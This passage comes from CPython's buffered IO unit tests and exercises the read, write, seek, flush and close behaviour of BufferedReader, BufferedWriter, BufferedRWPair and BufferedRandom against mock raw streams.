read_mode = "rb"
def test_constructor(self):
rawio = self.MockRawIO([b"abc"])
bufio = self.tp(rawio)
bufio.__init__(rawio)
bufio.__init__(rawio, buffer_size=1024)
bufio.__init__(rawio, buffer_size=16)
self.assertEqual(b"abc", bufio.read())
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
rawio = self.MockRawIO([b"abc"])
bufio.__init__(rawio)
self.assertEqual(b"abc", bufio.read())
def test_uninitialized(self):
bufio = self.tp.__new__(self.tp)
del bufio
bufio = self.tp.__new__(self.tp)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
bufio.read, 0)
bufio.__init__(self.MockRawIO())
self.assertEqual(bufio.read(0), b'')
def test_read(self):
for arg in (None, 7):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"abcdefg", bufio.read(arg))
# Invalid args
self.assertRaises(ValueError, bufio.read, -2)
def test_read1(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"a", bufio.read(1))
self.assertEqual(b"b", bufio.read1(1))
self.assertEqual(rawio._reads, 1)
self.assertEqual(b"", bufio.read1(0))
self.assertEqual(b"c", bufio.read1(100))
self.assertEqual(rawio._reads, 1)
self.assertEqual(b"d", bufio.read1(100))
self.assertEqual(rawio._reads, 2)
self.assertEqual(b"efg", bufio.read1(100))
self.assertEqual(rawio._reads, 3)
self.assertEqual(b"", bufio.read1(100))
self.assertEqual(rawio._reads, 4)
def test_read1_arbitrary(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"a", bufio.read(1))
self.assertEqual(b"bc", bufio.read1())
self.assertEqual(b"d", bufio.read1())
self.assertEqual(b"efg", bufio.read1(-1))
self.assertEqual(rawio._reads, 3)
self.assertEqual(b"", bufio.read1())
self.assertEqual(rawio._reads, 4)
def test_readinto(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
b = bytearray(2)
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"ab")
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"cd")
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"ef")
self.assertEqual(bufio.readinto(b), 1)
self.assertEqual(b, b"gf")
self.assertEqual(bufio.readinto(b), 0)
self.assertEqual(b, b"gf")
rawio = self.MockRawIO((b"abc", None))
bufio = self.tp(rawio)
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"ab")
self.assertEqual(bufio.readinto(b), 1)
self.assertEqual(b, b"cb")
def test_readinto1(self):
buffer_size = 10
rawio = self.MockRawIO((b"abc", b"de", b"fgh", b"jkl"))
bufio = self.tp(rawio, buffer_size=buffer_size)
b = bytearray(2)
self.assertEqual(bufio.peek(3), b'abc')
self.assertEqual(rawio._reads, 1)
self.assertEqual(bufio.readinto1(b), 2)
self.assertEqual(b, b"ab")
self.assertEqual(rawio._reads, 1)
self.assertEqual(bufio.readinto1(b), 1)
self.assertEqual(b[:1], b"c")
self.assertEqual(rawio._reads, 1)
self.assertEqual(bufio.readinto1(b), 2)
self.assertEqual(b, b"de")
self.assertEqual(rawio._reads, 2)
b = bytearray(2*buffer_size)
self.assertEqual(bufio.peek(3), b'fgh')
self.assertEqual(rawio._reads, 3)
self.assertEqual(bufio.readinto1(b), 6)
self.assertEqual(b[:6], b"fghjkl")
self.assertEqual(rawio._reads, 4)
def test_readinto_array(self):
buffer_size = 60
data = b"a" * 26
rawio = self.MockRawIO((data,))
bufio = self.tp(rawio, buffer_size=buffer_size)
# Create an array with element size > 1 byte
b = array.array('i', b'x' * 32)
assert len(b) != 16
# Read into it. We should get as many *bytes* as we can fit into b
# (which is more than the number of elements)
n = bufio.readinto(b)
self.assertGreater(n, len(b))
# Check that old contents of b are preserved
bm = memoryview(b).cast('B')
self.assertLess(n, len(bm))
self.assertEqual(bm[:n], data[:n])
self.assertEqual(bm[n:], b'x' * (len(bm[n:])))
def test_readinto1_array(self):
buffer_size = 60
data = b"a" * 26
rawio = self.MockRawIO((data,))
bufio = self.tp(rawio, buffer_size=buffer_size)
# Create an array with element size > 1 byte
b = array.array('i', b'x' * 32)
assert len(b) != 16
# Read into it. We should get as many *bytes* as we can fit into b
# (which is more than the number of elements)
n = bufio.readinto1(b)
self.assertGreater(n, len(b))
# Check that old contents of b are preserved
bm = memoryview(b).cast('B')
self.assertLess(n, len(bm))
self.assertEqual(bm[:n], data[:n])
self.assertEqual(bm[n:], b'x' * (len(bm[n:])))
def test_readlines(self):
def bufio():
rawio = self.MockRawIO((b"abc\n", b"d\n", b"ef"))
return self.tp(rawio)
self.assertEqual(bufio().readlines(), [b"abc\n", b"d\n", b"ef"])
self.assertEqual(bufio().readlines(5), [b"abc\n", b"d\n"])
self.assertEqual(bufio().readlines(None), [b"abc\n", b"d\n", b"ef"])
def test_buffering(self):
data = b"abcdefghi"
dlen = len(data)
tests = [
[ 100, [ 3, 1, 4, 8 ], [ dlen, 0 ] ],
[ 100, [ 3, 3, 3], [ dlen ] ],
[ 4, [ 1, 2, 4, 2 ], [ 4, 4, 1 ] ],
]
for bufsize, buf_read_sizes, raw_read_sizes in tests:
rawio = self.MockFileIO(data)
bufio = self.tp(rawio, buffer_size=bufsize)
pos = 0
for nbytes in buf_read_sizes:
self.assertEqual(bufio.read(nbytes), data[pos:pos+nbytes])
pos += nbytes
# this is mildly implementation-dependent
self.assertEqual(rawio.read_history, raw_read_sizes)
def test_read_non_blocking(self):
# Inject some None's in there to simulate EWOULDBLOCK
rawio = self.MockRawIO((b"abc", b"d", None, b"efg", None, None, None))
bufio = self.tp(rawio)
self.assertEqual(b"abcd", bufio.read(6))
self.assertEqual(b"e", bufio.read(1))
self.assertEqual(b"fg", bufio.read())
self.assertEqual(b"", bufio.peek(1))
self.assertIsNone(bufio.read())
self.assertEqual(b"", bufio.read())
rawio = self.MockRawIO((b"a", None, None))
self.assertEqual(b"a", rawio.readall())
self.assertIsNone(rawio.readall())
def test_read_past_eof(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"abcdefg", bufio.read(9000))
def test_read_all(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"abcdefg", bufio.read())
@support.requires_resource('cpu')
def test_threads(self):
try:
# Write out many bytes with exactly the same number of 0's,
# 1's... 255's. This will help us check that concurrent reading
# doesn't duplicate or forget contents.
N = 1000
l = list(range(256)) * N
random.shuffle(l)
s = bytes(bytearray(l))
with self.open(support.TESTFN, "wb") as f:
f.write(s)
with self.open(support.TESTFN, self.read_mode, buffering=0) as raw:
bufio = self.tp(raw, 8)
errors = []
results = []
def f():
try:
# Intra-buffer read then buffer-flushing read
for n in cycle([1, 19]):
s = bufio.read(n)
if not s:
break
# list.append() is atomic
results.append(s)
except Exception as e:
errors.append(e)
raise
threads = [threading.Thread(target=f) for x in range(20)]
with support.start_threads(threads):
time.sleep(0.02) # yield
self.assertFalse(errors,
"the following exceptions were caught: %r" % errors)
s = b''.join(results)
for i in range(256):
c = bytes(bytearray([i]))
self.assertEqual(s.count(c), N)
finally:
support.unlink(support.TESTFN)
def test_unseekable(self):
bufio = self.tp(self.MockUnseekableIO(b"A" * 10))
self.assertRaises(self.UnsupportedOperation, bufio.tell)
self.assertRaises(self.UnsupportedOperation, bufio.seek, 0)
bufio.read(1)
self.assertRaises(self.UnsupportedOperation, bufio.seek, 0)
self.assertRaises(self.UnsupportedOperation, bufio.tell)
def test_misbehaved_io(self):
rawio = self.MisbehavedRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertRaises(OSError, bufio.seek, 0)
self.assertRaises(OSError, bufio.tell)
# Silence destructor error
bufio.close = lambda: None
def test_no_extraneous_read(self):
# Issue #9550; when the raw IO object has satisfied the read request,
# we should not issue any additional reads, otherwise it may block
# (e.g. socket).
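        # For example, with a BufferedReader wrapping a socket, a speculative
        # extra raw read to refill the buffer after the request is already
        # satisfied could block indefinitely waiting for data that never
        # arrives.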
bufsize = 16
for n in (2, bufsize - 1, bufsize, bufsize + 1, bufsize * 2):
rawio = self.MockRawIO([b"x" * n])
bufio = self.tp(rawio, bufsize)
self.assertEqual(bufio.read(n), b"x" * n)
# Simple case: one raw read is enough to satisfy the request.
self.assertEqual(rawio._extraneous_reads, 0,
"failed for {}: {} != 0".format(n, rawio._extraneous_reads))
# A more complex case where two raw reads are needed to satisfy
# the request.
rawio = self.MockRawIO([b"x" * (n - 1), b"x"])
bufio = self.tp(rawio, bufsize)
self.assertEqual(bufio.read(n), b"x" * n)
self.assertEqual(rawio._extraneous_reads, 0,
"failed for {}: {} != 0".format(n, rawio._extraneous_reads))
def test_read_on_closed(self):
# Issue #23796
b = io.BufferedReader(io.BytesIO(b"12"))
b.read(1)
b.close()
self.assertRaises(ValueError, b.peek)
self.assertRaises(ValueError, b.read1, 1)
class CBufferedReaderTest(BufferedReaderTest, SizeofTest):
tp = io.BufferedReader
@unittest.skipIf(MEMORY_SANITIZER, "MSan defaults to crashing "
"instead of returning NULL for malloc failure.")
def test_constructor(self):
BufferedReaderTest.test_constructor(self)
# The allocation can succeed on 32-bit builds, e.g. with more
# than 2 GiB RAM and a 64-bit kernel.
if sys.maxsize > 0x7FFFFFFF:
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises((OverflowError, MemoryError, ValueError),
bufio.__init__, rawio, sys.maxsize)
def test_initialization(self):
rawio = self.MockRawIO([b"abc"])
bufio = self.tp(rawio)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.read)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.read)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
self.assertRaises(ValueError, bufio.read)
def test_misbehaved_io_read(self):
rawio = self.MisbehavedRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
        # _pyio.BufferedReader seems to implement reading differently, so
        # checking this is not so easy.
self.assertRaises(OSError, bufio.read, 10)
def test_garbage_collection(self):
# C BufferedReader objects are collected.
        # The Python version has __del__, so it ends up in gc.garbage instead
self.addCleanup(support.unlink, support.TESTFN)
with support.check_warnings(('', ResourceWarning)):
rawio = self.FileIO(support.TESTFN, "w+b")
f = self.tp(rawio)
f.f = f
wr = weakref.ref(f)
del f
support.gc_collect()
self.assertIsNone(wr(), wr)
def test_args_error(self):
# Issue #17275
with self.assertRaisesRegex(TypeError, "BufferedReader"):
self.tp(io.BytesIO(), 1024, 1024, 1024)
class PyBufferedReaderTest(BufferedReaderTest):
tp = pyio.BufferedReader
class BufferedWriterTest(unittest.TestCase, CommonBufferedTests):
write_mode = "wb"
def test_constructor(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
bufio.__init__(rawio)
bufio.__init__(rawio, buffer_size=1024)
bufio.__init__(rawio, buffer_size=16)
self.assertEqual(3, bufio.write(b"abc"))
bufio.flush()
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
bufio.__init__(rawio)
self.assertEqual(3, bufio.write(b"ghi"))
bufio.flush()
self.assertEqual(b"".join(rawio._write_stack), b"abcghi")
def test_uninitialized(self):
bufio = self.tp.__new__(self.tp)
del bufio
bufio = self.tp.__new__(self.tp)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
bufio.write, b'')
bufio.__init__(self.MockRawIO())
self.assertEqual(bufio.write(b''), 0)
def test_detach_flush(self):
raw = self.MockRawIO()
buf = self.tp(raw)
buf.write(b"howdy!")
self.assertFalse(raw._write_stack)
buf.detach()
self.assertEqual(raw._write_stack, [b"howdy!"])
def test_write(self):
# Write to the buffered IO but don't overflow the buffer.
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.write(b"abc")
self.assertFalse(writer._write_stack)
buffer = bytearray(b"def")
bufio.write(buffer)
buffer[:] = b"***" # Overwrite our copy of the data
bufio.flush()
self.assertEqual(b"".join(writer._write_stack), b"abcdef")
def test_write_overflow(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
contents = b"abcdefghijklmnop"
for n in range(0, len(contents), 3):
bufio.write(contents[n:n+3])
flushed = b"".join(writer._write_stack)
# At least (total - 8) bytes were implicitly flushed, perhaps more
# depending on the implementation.
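        # (Here contents is 16 bytes written through an 8-byte buffer, so at
        # least the first 8 bytes must already have reached the raw stream.)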
self.assertTrue(flushed.startswith(contents[:-8]), flushed)
def check_writes(self, intermediate_func):
# Lots of writes, test the flushed output is as expected.
contents = bytes(range(256)) * 1000
n = 0
writer = self.MockRawIO()
bufio = self.tp(writer, 13)
# Generator of write sizes: repeat each N 15 times then proceed to N+1
def gen_sizes():
for size in count(1):
for i in range(15):
yield size
sizes = gen_sizes()
while n < len(contents):
size = min(next(sizes), len(contents) - n)
self.assertEqual(bufio.write(contents[n:n+size]), size)
intermediate_func(bufio)
n += size
bufio.flush()
self.assertEqual(contents, b"".join(writer._write_stack))
def test_writes(self):
self.check_writes(lambda bufio: None)
def test_writes_and_flushes(self):
self.check_writes(lambda bufio: bufio.flush())
def test_writes_and_seeks(self):
def _seekabs(bufio):
pos = bufio.tell()
bufio.seek(pos + 1, 0)
bufio.seek(pos - 1, 0)
bufio.seek(pos, 0)
self.check_writes(_seekabs)
def _seekrel(bufio):
pos = bufio.seek(0, 1)
bufio.seek(+1, 1)
bufio.seek(-1, 1)
bufio.seek(pos, 0)
self.check_writes(_seekrel)
def test_writes_and_truncates(self):
self.check_writes(lambda bufio: bufio.truncate(bufio.tell()))
def test_write_non_blocking(self):
raw = self.MockNonBlockWriterIO()
bufio = self.tp(raw, 8)
self.assertEqual(bufio.write(b"abcd"), 4)
self.assertEqual(bufio.write(b"efghi"), 5)
# 1 byte will be written, the rest will be buffered
raw.block_on(b"k")
self.assertEqual(bufio.write(b"jklmn"), 5)
# 8 bytes will be written, 8 will be buffered and the rest will be lost
raw.block_on(b"0")
try:
bufio.write(b"opqrwxyz0123456789")
except self.BlockingIOError as e:
written = e.characters_written
else:
self.fail("BlockingIOError should have been raised")
self.assertEqual(written, 16)
self.assertEqual(raw.pop_written(),
b"abcdefghijklmnopqrwxyz")
self.assertEqual(bufio.write(b"ABCDEFGHI"), 9)
s = raw.pop_written()
# Previously buffered bytes were flushed
self.assertTrue(s.startswith(b"01234567A"), s)
def test_write_and_rewind(self):
raw = io.BytesIO()
bufio = self.tp(raw, 4)
self.assertEqual(bufio.write(b"abcdef"), 6)
self.assertEqual(bufio.tell(), 6)
bufio.seek(0, 0)
self.assertEqual(bufio.write(b"XY"), 2)
bufio.seek(6, 0)
self.assertEqual(raw.getvalue(), b"XYcdef")
self.assertEqual(bufio.write(b"123456"), 6)
bufio.flush()
self.assertEqual(raw.getvalue(), b"XYcdef123456")
def test_flush(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.write(b"abc")
bufio.flush()
self.assertEqual(b"abc", writer._write_stack[0])
def test_writelines(self):
l = [b'ab', b'cd', b'ef']
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.writelines(l)
bufio.flush()
self.assertEqual(b''.join(writer._write_stack), b'abcdef')
def test_writelines_userlist(self):
l = UserList([b'ab', b'cd', b'ef'])
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.writelines(l)
bufio.flush()
self.assertEqual(b''.join(writer._write_stack), b'abcdef')
def test_writelines_error(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
self.assertRaises(TypeError, bufio.writelines, [1, 2, 3])
self.assertRaises(TypeError, bufio.writelines, None)
self.assertRaises(TypeError, bufio.writelines, 'abc')
def test_destructor(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.write(b"abc")
del bufio
support.gc_collect()
self.assertEqual(b"abc", writer._write_stack[0])
def test_truncate(self):
# Truncate implicitly flushes the buffer.
self.addCleanup(support.unlink, support.TESTFN)
with self.open(support.TESTFN, self.write_mode, buffering=0) as raw:
bufio = self.tp(raw, 8)
bufio.write(b"abcdef")
self.assertEqual(bufio.truncate(3), 3)
self.assertEqual(bufio.tell(), 6)
with self.open(support.TESTFN, "rb", buffering=0) as f:
self.assertEqual(f.read(), b"abc")
def test_truncate_after_write(self):
# Ensure that truncate preserves the file position after
# writes longer than the buffer size.
# Issue: https://bugs.python.org/issue32228
self.addCleanup(support.unlink, support.TESTFN)
with self.open(support.TESTFN, "wb") as f:
# Fill with some buffer
f.write(b'\x00' * 10000)
buffer_sizes = [8192, 4096, 200]
for buffer_size in buffer_sizes:
with self.open(support.TESTFN, "r+b", buffering=buffer_size) as f:
f.write(b'\x00' * (buffer_size + 1))
                # After the write, write_pos and write_end are set to 0
                f.read(1)
                # The read operation makes sure that pos != raw_pos
f.truncate()
self.assertEqual(f.tell(), buffer_size + 2)
@support.requires_resource('cpu')
def test_threads(self):
try:
# Write out many bytes from many threads and test they were
# all flushed.
N = 1000
contents = bytes(range(256)) * N
sizes = cycle([1, 19])
n = 0
queue = deque()
while n < len(contents):
size = next(sizes)
queue.append(contents[n:n+size])
n += size
del contents
# We use a real file object because it allows us to
# exercise situations where the GIL is released before
# writing the buffer to the raw streams. This is in addition
# to concurrency issues due to switching threads in the middle
# of Python code.
with self.open(support.TESTFN, self.write_mode, buffering=0) as raw:
bufio = self.tp(raw, 8)
errors = []
def f():
try:
while True:
try:
s = queue.popleft()
except IndexError:
return
bufio.write(s)
except Exception as e:
errors.append(e)
raise
threads = [threading.Thread(target=f) for x in range(20)]
with support.start_threads(threads):
time.sleep(0.02) # yield
self.assertFalse(errors,
"the following exceptions were caught: %r" % errors)
bufio.close()
with self.open(support.TESTFN, "rb") as f:
s = f.read()
for i in range(256):
self.assertEqual(s.count(bytes([i])), N)
finally:
support.unlink(support.TESTFN)
def test_misbehaved_io(self):
rawio = self.MisbehavedRawIO()
bufio = self.tp(rawio, 5)
self.assertRaises(OSError, bufio.seek, 0)
self.assertRaises(OSError, bufio.tell)
self.assertRaises(OSError, bufio.write, b"abcdef")
# Silence destructor error
bufio.close = lambda: None
def test_max_buffer_size_removal(self):
with self.assertRaises(TypeError):
self.tp(self.MockRawIO(), 8, 12)
def test_write_error_on_close(self):
raw = self.MockRawIO()
def bad_write(b):
raise OSError()
raw.write = bad_write
b = self.tp(raw)
b.write(b'spam')
self.assertRaises(OSError, b.close) # exception not swallowed
self.assertTrue(b.closed)
def test_slow_close_from_thread(self):
# Issue #31976
rawio = self.SlowFlushRawIO()
bufio = self.tp(rawio, 8)
t = threading.Thread(target=bufio.close)
t.start()
rawio.in_flush.wait()
self.assertRaises(ValueError, bufio.write, b'spam')
self.assertTrue(bufio.closed)
t.join()
class CBufferedWriterTest(BufferedWriterTest, SizeofTest):
tp = io.BufferedWriter
@unittest.skipIf(MEMORY_SANITIZER, "MSan defaults to crashing "
"instead of returning NULL for malloc failure.")
def test_constructor(self):
BufferedWriterTest.test_constructor(self)
# The allocation can succeed on 32-bit builds, e.g. with more
# than 2 GiB RAM and a 64-bit kernel.
if sys.maxsize > 0x7FFFFFFF:
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises((OverflowError, MemoryError, ValueError),
bufio.__init__, rawio, sys.maxsize)
def test_initialization(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.write, b"def")
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.write, b"def")
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
self.assertRaises(ValueError, bufio.write, b"def")
def test_garbage_collection(self):
# C BufferedWriter objects are collected, and collecting them flushes
# all data to disk.
        # The Python version has __del__, so it ends up in gc.garbage instead
self.addCleanup(support.unlink, support.TESTFN)
with support.check_warnings(('', ResourceWarning)):
rawio = self.FileIO(support.TESTFN, "w+b")
f = self.tp(rawio)
f.write(b"123xxx")
f.x = f
wr = weakref.ref(f)
del f
support.gc_collect()
self.assertIsNone(wr(), wr)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"123xxx")
def test_args_error(self):
# Issue #17275
with self.assertRaisesRegex(TypeError, "BufferedWriter"):
self.tp(io.BytesIO(), 1024, 1024, 1024)
class PyBufferedWriterTest(BufferedWriterTest):
tp = pyio.BufferedWriter
class BufferedRWPairTest(unittest.TestCase):
def test_constructor(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertFalse(pair.closed)
def test_uninitialized(self):
pair = self.tp.__new__(self.tp)
del pair
pair = self.tp.__new__(self.tp)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
pair.read, 0)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
pair.write, b'')
pair.__init__(self.MockRawIO(), self.MockRawIO())
self.assertEqual(pair.read(0), b'')
self.assertEqual(pair.write(b''), 0)
def test_detach(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertRaises(self.UnsupportedOperation, pair.detach)
def test_constructor_max_buffer_size_removal(self):
with self.assertRaises(TypeError):
self.tp(self.MockRawIO(), self.MockRawIO(), 8, 12)
def test_constructor_with_not_readable(self):
class NotReadable(MockRawIO):
def readable(self):
return False
self.assertRaises(OSError, self.tp, NotReadable(), self.MockRawIO())
def test_constructor_with_not_writeable(self):
class NotWriteable(MockRawIO):
def writable(self):
return False
self.assertRaises(OSError, self.tp, self.MockRawIO(), NotWriteable())
def test_read(self):
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
self.assertEqual(pair.read(3), b"abc")
self.assertEqual(pair.read(1), b"d")
self.assertEqual(pair.read(), b"ef")
pair = self.tp(self.BytesIO(b"abc"), self.MockRawIO())
self.assertEqual(pair.read(None), b"abc")
def test_readlines(self):
pair = lambda: self.tp(self.BytesIO(b"abc\ndef\nh"), self.MockRawIO())
self.assertEqual(pair().readlines(), [b"abc\n", b"def\n", b"h"])
self.assertEqual(pair().readlines(), [b"abc\n", b"def\n", b"h"])
self.assertEqual(pair().readlines(5), [b"abc\n", b"def\n"])
def test_read1(self):
# .read1() is delegated to the underlying reader object, so this test
# can be shallow.
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
self.assertEqual(pair.read1(3), b"abc")
self.assertEqual(pair.read1(), b"def")
def test_readinto(self):
for method in ("readinto", "readinto1"):
with self.subTest(method):
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
data = byteslike(b'\0' * 5)
self.assertEqual(getattr(pair, method)(data), 5)
self.assertEqual(bytes(data), b"abcde")
def test_write(self):
w = self.MockRawIO()
pair = self.tp(self.MockRawIO(), w)
pair.write(b"abc")
pair.flush()
buffer = bytearray(b"def")
pair.write(buffer)
buffer[:] = b"***" # Overwrite our copy of the data
pair.flush()
self.assertEqual(w._write_stack, [b"abc", b"def"])
def test_peek(self):
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
self.assertTrue(pair.peek(3).startswith(b"abc"))
self.assertEqual(pair.read(3), b"abc")
def test_readable(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertTrue(pair.readable())
def test_writeable(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertTrue(pair.writable())
def test_seekable(self):
# BufferedRWPairs are never seekable, even if their readers and writers
# are.
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertFalse(pair.seekable())
# .flush() is delegated to the underlying writer object and has been
# tested in the test_write method.
def test_close_and_closed(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertFalse(pair.closed)
pair.close()
self.assertTrue(pair.closed)
def test_reader_close_error_on_close(self):
def reader_close():
reader_non_existing
reader = self.MockRawIO()
reader.close = reader_close
writer = self.MockRawIO()
pair = self.tp(reader, writer)
with self.assertRaises(NameError) as err:
pair.close()
self.assertIn('reader_non_existing', str(err.exception))
self.assertTrue(pair.closed)
self.assertFalse(reader.closed)
self.assertTrue(writer.closed)
# Silence destructor error
reader.close = lambda: None
def test_writer_close_error_on_close(self):
def writer_close():
writer_non_existing
reader = self.MockRawIO()
writer = self.MockRawIO()
writer.close = writer_close
pair = self.tp(reader, writer)
with self.assertRaises(NameError) as err:
pair.close()
self.assertIn('writer_non_existing', str(err.exception))
self.assertFalse(pair.closed)
self.assertTrue(reader.closed)
self.assertFalse(writer.closed)
# Silence destructor error
writer.close = lambda: None
writer = None
# Ignore BufferedWriter (of the BufferedRWPair) unraisable exception
with support.catch_unraisable_exception():
# Ignore BufferedRWPair unraisable exception
with support.catch_unraisable_exception():
pair = None
support.gc_collect()
support.gc_collect()
def test_reader_writer_close_error_on_close(self):
def reader_close():
reader_non_existing
def writer_close():
writer_non_existing
reader = self.MockRawIO()
reader.close = reader_close
writer = self.MockRawIO()
writer.close = writer_close
pair = self.tp(reader, writer)
with self.assertRaises(NameError) as err:
pair.close()
self.assertIn('reader_non_existing', str(err.exception))
self.assertIsInstance(err.exception.__context__, NameError)
self.assertIn('writer_non_existing', str(err.exception.__context__))
self.assertFalse(pair.closed)
self.assertFalse(reader.closed)
self.assertFalse(writer.closed)
# Silence destructor error
reader.close = lambda: None
writer.close = lambda: None
def test_isatty(self):
class SelectableIsAtty(MockRawIO):
def __init__(self, isatty):
MockRawIO.__init__(self)
self._isatty = isatty
def isatty(self):
return self._isatty
pair = self.tp(SelectableIsAtty(False), SelectableIsAtty(False))
self.assertFalse(pair.isatty())
pair = self.tp(SelectableIsAtty(True), SelectableIsAtty(False))
self.assertTrue(pair.isatty())
pair = self.tp(SelectableIsAtty(False), SelectableIsAtty(True))
self.assertTrue(pair.isatty())
pair = self.tp(SelectableIsAtty(True), SelectableIsAtty(True))
self.assertTrue(pair.isatty())
def test_weakref_clearing(self):
brw = self.tp(self.MockRawIO(), self.MockRawIO())
ref = weakref.ref(brw)
brw = None
ref = None # Shouldn't segfault.
class CBufferedRWPairTest(BufferedRWPairTest):
tp = io.BufferedRWPair
class PyBufferedRWPairTest(BufferedRWPairTest):
tp = pyio.BufferedRWPair
class BufferedRandomTest(BufferedReaderTest, BufferedWriterTest):
read_mode = "rb+"
write_mode = "wb+"
def test_constructor(self):
BufferedReaderTest.test_constructor(self)
BufferedWriterTest.test_constructor(self)
def test_uninitialized(self):
BufferedReaderTest.test_uninitialized(self)
BufferedWriterTest.test_uninitialized(self)
def test_read_and_write(self):
raw = self.MockRawIO((b"asdf", b"ghjk"))
rw = self.tp(raw, 8)
self.assertEqual(b"as", rw.read(2))
rw.write(b"ddd")
rw.write(b"eee")
self.assertFalse(raw._write_stack) # Buffer writes
self.assertEqual(b"ghjk", rw.read())
self.assertEqual(b"dddeee", raw._write_stack[0])
def test_seek_and_tell(self):
raw = self.BytesIO(b"asdfghjkl")
rw = self.tp(raw)
self.assertEqual(b"as", rw.read(2))
self.assertEqual(2, rw.tell())
rw.seek(0, 0)
self.assertEqual(b"asdf", rw.read(4))
rw.write(b"123f")
rw.seek(0, 0)
self.assertEqual(b"asdf123fl", rw.read())
self.assertEqual(9, rw.tell())
rw.seek(-4, 2)
self.assertEqual(5, rw.tell())
rw.seek(2, 1)
self.assertEqual(7, rw.tell())
self.assertEqual(b"fl", rw.read(11))
rw.flush()
self.assertEqual(b"asdf123fl", raw.getvalue())
self.assertRaises(TypeError, rw.seek, 0.0)
def check_flush_and_read(self, read_func):
raw = self.BytesIO(b"abcdefghi")
bufio = self.tp(raw)
self.assertEqual(b"ab", read_func(bufio, 2))
bufio.write(b"12")
self.assertEqual(b"ef", read_func(bufio, 2))
self.assertEqual(6, bufio.tell())
bufio.flush()
self.assertEqual(6, bufio.tell())
self.assertEqual(b"ghi", read_func(bufio))
raw.seek(0, 0)
raw.write(b"XYZ")
# flush() resets the read buffer
bufio.flush()
bufio.seek(0, 0)
self.assertEqual(b"XYZ", read_func(bufio, 3))
def test_flush_and_read(self):
self.check_flush_and_read(lambda bufio, *args: bufio.read(*args))
def test_flush_and_readinto(self):
def _readinto(bufio, n=-1):
b = bytearray(n if n >= 0 else 9999)
n = bufio.readinto(b)
return bytes(b[:n])
self.check_flush_and_read(_readinto)
def test_flush_and_peek(self):
def _peek(bufio, n=-1):
# This relies on the fact that the buffer can contain the whole
# raw stream, otherwise peek() can return less.
b = bufio.peek(n)
if n != -1:
b = b[:n]
bufio.seek(len(b), 1)
return b
self.check_flush_and_read(_peek)
def test_flush_and_write(self):
raw = self.BytesIO(b"abcdefghi")
bufio = self.tp(raw)
bufio.write(b"123")
bufio.flush()
bufio.write(b"45")
bufio.flush()
bufio.seek(0, 0)
self.assertEqual(b"12345fghi", raw.getvalue())
self.assertEqual(b"12345fghi", bufio.read())
def test_threads(self):
BufferedReaderTest.test_threads(self)
BufferedWriterTest.test_threads(self)
def test_writes_and_peek(self):
def _peek(bufio):
bufio.peek(1)
self.check_writes(_peek)
def _peek(bufio):
pos = bufio.tell()
bufio.seek(-1, 1)
bufio.peek(1)
bufio.seek(pos, 0)
self.check_writes(_peek)
def test_writes_and_reads(self):
def _read(bufio):
bufio.seek(-1, 1)
bufio.read(1)
self.check_writes(_read)
def test_writes_and_read1s(self):
def _read1(bufio):
bufio.seek(-1, 1)
bufio.read1(1)
self.check_writes(_read1)
def test_writes_and_readintos(self):
def _read(bufio):
